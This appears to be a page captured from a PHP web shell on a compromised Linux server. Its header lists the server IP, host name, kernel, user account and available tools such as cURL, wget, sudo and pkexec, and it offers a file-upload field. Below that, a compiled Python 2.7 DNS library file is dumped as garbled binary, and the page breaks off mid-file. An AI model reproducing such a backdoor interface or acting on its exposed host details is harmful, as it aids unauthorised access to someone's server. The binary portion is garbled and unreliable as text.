Done !
| Server IP : 162.240.50.153 / Your IP : 216.73.216.201 Web Server : Apache System : Linux vps-880082.mktpower.cl 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64 User : wwmktp ( 1003) PHP Version : 8.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /lib64/python2.7/site-packages/dns/rdtypes/ |
Upload File : |
�
!`Nc @ s� d Z d d l Z d d l Z d d l Z d d l Z d d l Z d e j j f d � � YZ d e f d � � YZ
d e f d � � YZ d S( s MX-like base classes.i����Nt MXBasec B s� e Z d Z d d g Z d � Z d e d � Z d e d � Z e e � Z d d d � Z
d d � Z d d � Z e e � Z d e d � Z
d
� Z RS( s� Base class for rdata that is like an MX record.
@ivar preference: the preference value
@type preference: int
@ivar exchange: the exchange name
@type exchange: dns.name.Name objectt
preferencet exchangec C s/ t t | � j | | � | | _ | | _ d S( N( t superR t __init__R R ( t selft rdclasst rdtypeR R ( ( s8 /usr/lib64/python2.7/site-packages/dns/rdtypes/mxbase.pyR # s c K s&